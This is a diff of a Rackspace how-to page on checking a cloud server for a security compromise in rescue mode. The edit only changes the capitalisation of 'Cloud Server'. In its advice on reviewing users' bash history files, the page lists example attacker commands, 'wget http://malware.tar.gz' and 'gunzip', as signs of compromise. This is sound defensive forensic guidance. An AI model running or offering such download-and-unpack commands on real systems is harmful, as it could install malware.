rackerlabs/rackspace-how-to/content/cloud-servers/checking-for-a-security-compromise-rescue-mode-investigation.md

 ### Check last commands

-To get an idea of how the cloud server security was breached, check which users ran commands before the cloud server was compromised.
+To get an idea of how the Cloud Server security was breached, check which users ran commands before the Cloud Server was compromised.

 The **.bashhistory** file contains the last commands used with the Bash shell.
 You need to check the **.bashhistory** files in each user's home directory.
 The most important **.bashhistory** file is the one belonging to root: **/root/.bashhistory**.

-A compromised cloud server might have entries like the following ones:
+A compromised Cloud Server might have entries like the following ones:

     wget http://malware.tar.gz
     gunzip malware.tar.gz